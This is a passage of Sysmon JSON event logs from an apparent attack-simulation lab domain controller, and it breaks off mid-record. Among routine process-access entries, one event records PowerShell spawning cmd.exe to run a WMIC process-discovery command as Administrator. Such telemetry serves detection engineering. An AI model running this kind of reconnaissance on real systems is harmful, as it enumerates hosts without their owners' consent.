{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5251,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5252,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5253,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5254,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001085460800}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001085460800}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5255,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001085460800}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001085460800}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5256,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.061\r\nProcessGuid: {41C8662E-20D2-5F25-0000-001051470800}\r\nProcessId: 3296\r\nImage: C:\\Windows\\System32\\wbem\\WMIC.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: wmic  process get caption,executablepath,commandline /format:csv \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E\r\nParentProcessGuid: {41C8662E-20D2-5F25-0000-001085460800}\r\nParentProcessId: 4700\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process get caption,executablepath,commandline /format:csv\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.061","ProcessGuid":"{41C8662E-20D2-5F25-0000-001051470800}","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"WMI Commandline Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"wmic.exe","CommandLine":"wmic  process get caption,executablepath,commandline /format:csv ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E","ParentProcessGuid":"{41C8662E-20D2-5F25-0000-001085460800}","ParentProcessId":"4700","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process get caption,executablepath,commandline /format:csv\" ","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5257,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-20D2-5F25-0000-001085460800}\r\nSourceProcessId: 4700\r\nSourceThreadId: 4624\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001051470800}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-20D2-5F25-0000-001085460800}","SourceProcessId":"4700","SourceThreadId":"4624","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001051470800}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5258,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001051470800}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001051470800}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5259,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5260,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: 